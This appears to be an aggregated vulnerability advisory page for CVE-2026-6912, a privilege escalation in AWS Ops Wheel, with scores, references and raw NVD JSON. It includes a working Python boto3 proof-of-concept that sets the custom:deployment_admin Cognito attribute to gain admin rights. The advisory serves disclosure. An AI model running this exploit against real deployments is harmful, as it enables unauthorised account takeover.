Security Vulnerability Report
CVE-2026-6912 CVSS 8.8 HIGH

CVE-2026-6912

Published: 2026-04-24 17:16:22
Last Modified: 2026-04-24 17:56:41
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

Improperly controlled modification of dynamically-determined object attributes in the Cognito User Pool configuration in AWS Ops Wheel before PR #165 allows remote authenticated users to escalate to deployment admin privileges and manage Cognito user accounts via a crafted UpdateUserAttributes API call that sets the custom:deployment_admin attribute. To remediate this issue, users should redeploy from the updated repository and ensure any forked or derivative code is patched to incorporate the new fixes.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AWS Ops Wheel < PR #165

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import boto3

# PoC for CVE-2026-6912: AWS Ops Wheel Privilege Escalation
# Requires: AWS credentials with low privileges in the target User Pool

client = boto3.client('cognito-idp', region_name='us-east-1')

# Configuration
# The User Pool ID is kept for reference only: UpdateUserAttributes is scoped by the
# access token and does not accept a UserPoolId parameter.
USER_POOL_ID = 'us-east-1_XXXXXXXXX'
ACCESS_TOKEN = 'LOW_PRIVILEGE_ACCESS_TOKEN'


def exploit():
    try:
        print("[+] Attempting to escalate privileges by modifying custom:deployment_admin attribute...")
        # The vulnerability allows any authenticated user to set the admin attribute
        response = client.update_user_attributes(
            AccessToken=ACCESS_TOKEN,
            UserAttributes=[
                {
                    'Name': 'custom:deployment_admin',
                    'Value': 'true'
                }
            ]
        )
        print("[+] Exploit successful! User attributes updated.")
        print(f"[+] Response: {response}")
        print("[+] Verify privileges by attempting admin actions.")
    except client.exceptions.NotAuthorizedException:
        print("[-] Exploit failed: Invalid credentials or token.")
    except client.exceptions.InvalidParameterException as e:
        print(f"[-] Exploit failed: Invalid parameter - {e}")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")


if __name__ == "__main__":
    exploit()
```

References

https://aws.amazon.com/security/security-bulletins/2026-018-aws/
https://github.com/aws/aws-ops-wheel/pull/165
https://github.com/aws/aws-ops-wheel/security/advisories/GHSA-qvfh-9cjw-8wwq
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-6912", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-04-24T17:16:22.377", "lastModified": "2026-04-24T17:56:41.280", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improperly controlled modification of dynamically-determined object attributes in the Cognito User Pool configuration in AWS Ops Wheel before PR #165 allows remote authenticated users to escalate to deployment admin privileges and manage Cognito user accounts via a crafted UpdateUserAttributes API call that sets the custom:deployment_admin attribute.\n\nTo remediate this issue, users should redeploy from the updated repository and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-915"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-018-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-ops-wheel/pull/165", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-ops-wheel/security/advisories/GHSA-qvfh-9cjw-8wwq", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}
```